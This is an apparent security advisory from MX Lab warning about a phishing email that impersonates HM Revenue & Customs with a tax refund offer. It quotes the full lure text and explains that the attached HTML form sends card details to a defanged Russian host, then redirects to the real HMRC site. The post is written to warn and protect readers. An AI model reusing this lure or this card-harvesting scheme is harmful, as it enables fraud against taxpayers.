Fake emails from HM Revenue & Customs is a phishing attempt

MX Lab, http://www.mxlab.eu, started to intercept a new phishing  campaign with the subject “HM Revenue & Customs – Important Refund Notification!”.

The email is send from the spoofed address “HM Revenue & Customs <refunds@hmrc.gov.uk>” and has the following body regarding a refund:

HM Revenue & Customs (HMRC)


Dear Sir/Madame,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 379.83 GBP
Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps bellow:

– download the Tax Refund Form attached to this email
– open it in a browser (recommended internet explorer)
– follow the instructions on your screen

NOTE: Fill in all required fields, otherwise the refund process will be canceled.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

Revenue and Tax Administrator

HM Revenue & Customs
Tax Credit Office
PO Box 1970
L75 1WX


© Crown Copyright, HM Revenue & Customs

Attached is the HTML page named HM Revenue&Customs  – Refund Form.html. When opening HM Revenue&Customs  – Refund Form.html you will get an HTML web form with the lay out of the HM Revenue & Customs.

Data of the form, items such as name, birthday, VISA card number, security code and expiration date, is all submitted towards hxxp://rosuik.ru/images/template/files/html/ and a redirect towards http://search2.hmrc.gov.uk/kb5/hmrc/contactus/home.page is executed afterwards.

MX Lab advices not to follow the instructions as specified in this email because they are attempts to steal valuable data from a person that can and will be abused. Banks and other institutions will never ask you to open an local HTML page and fill in such details.